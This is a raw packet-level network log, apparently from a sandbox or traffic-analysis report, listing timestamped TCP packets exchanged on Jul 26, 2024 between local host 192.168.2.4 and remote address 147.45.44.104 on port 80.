Jul 26, 2024 18:56:42.275448084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275460958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275471926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275484085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275509119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.275551081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.275696039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275708914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275719881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275759935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.275760889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.275830984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275842905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275855064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275866985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275906086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.275943995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.275945902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275959969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275970936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.275985003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.276038885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.321551085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.321588993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.321600914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.321676970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.321886063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.321904898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.321918011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.321929932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.321960926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.321960926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.321973085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.321985960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.321988106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.321999073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322010994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322022915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322033882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322035074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322046995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322060108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322062969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322062969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322072983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322088003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322107077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322649002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322660923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322673082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322685003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322696924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322707891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322720051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322731018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322731972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322731972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322731972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322742939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322753906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322767019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322772980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322772980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322778940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322793007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322803974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.322813034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322813034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322832108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.322853088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.327765942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327778101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327788115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327800035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327811003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327821970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327833891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327836037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.327846050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327858925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327862978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.327862978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.327871084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327883005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327888012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.327894926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327905893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.327908039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327920914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327931881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.327936888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.327959061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.327977896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331361055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331372976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331384897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331396103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331407070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331418037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331428051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331435919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331439972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331459045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331470966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331471920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331470966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331484079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331496954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331507921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331520081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331522942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331531048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331522942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331542969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331556082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331562996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331584930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331584930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331605911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331760883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331773996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331784964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331798077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331820965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331855059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331866980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331880093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331892014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331902027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331911087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331912994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331924915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331932068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331937075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331949949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.331950903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331970930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.331988096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.365693092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.366127968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.366138935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.366211891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.367419004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.367429972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.367475033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.367506027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.367789984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.367800951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.367844105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.388030052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.388149977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.388159990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.388204098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.388267040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.388901949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.388911963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.388947964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.389647961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.389658928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.389694929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.390389919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.390399933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.390438080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.390476942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.391172886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.391186953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.391212940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.391247034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.391968012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.391979933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.391988993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.392023087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.392067909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.392724991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.392735958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.392793894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.393598080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.393609047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.393645048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.393680096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.394439936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.394452095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.394494057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.394494057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.395148993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.395159960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.395169973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.395200968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.395231009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.395836115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.395848036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.395891905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.396857023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.396867990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.396903038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.404285908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.404350996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.404478073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.404494047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.404540062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.404540062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.405177116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.405188084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.405226946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.405986071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.405997038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.406050920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.406083107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.407309055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.407320023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.407363892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.408354998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.408368111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.408420086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.408953905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.408967018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.408977032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.408999920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.409030914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.409774065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.409785986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.409820080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.409847975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.410368919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.410381079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.410423040 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.411149979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.411161900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.411196947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.411228895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.411489964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.411503077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.411511898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.411542892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.411571980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.412334919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.412347078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.412391901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.413243055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.413254976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.413296938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.413327932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.413701057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.413712978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.413747072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.413778067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.414482117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.414494038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.414542913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.415275097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.415287018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.415296078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.415329933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.415358067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.423345089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.423440933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.423449993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.423506021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.423935890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.423947096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.423985004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.424014091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.424663067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.424674034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.424684048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.424727917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.424777985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.425726891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.425739050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.425749063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.425787926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.425817013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.427015066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.427026987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.427037001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.427047014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.427072048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.427114010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.428350925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.428363085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.428371906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.428400993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.428432941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.429116011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.429126978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.429136992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.429167986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.429198980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.430118084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.430130005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.430138111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.430146933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.430171013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.430213928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.431524992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.431535959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.431545973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.431575060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.431603909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.432054996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.432068110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.432076931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.432112932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.432145119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.433372021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.433383942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.433393002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.433403015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.433438063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.433486938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.434144974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.434156895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.434165955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.434202909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.434202909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.434938908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.434950113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.434993029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.435025930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.473809958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.473943949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.473954916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.474013090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.474083900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.474589109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.474601984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.474611998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.474643946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.474643946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.474699974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.476212978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.476224899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.476234913 CEST	80	49757	147.45.44.104	192.168.2.4
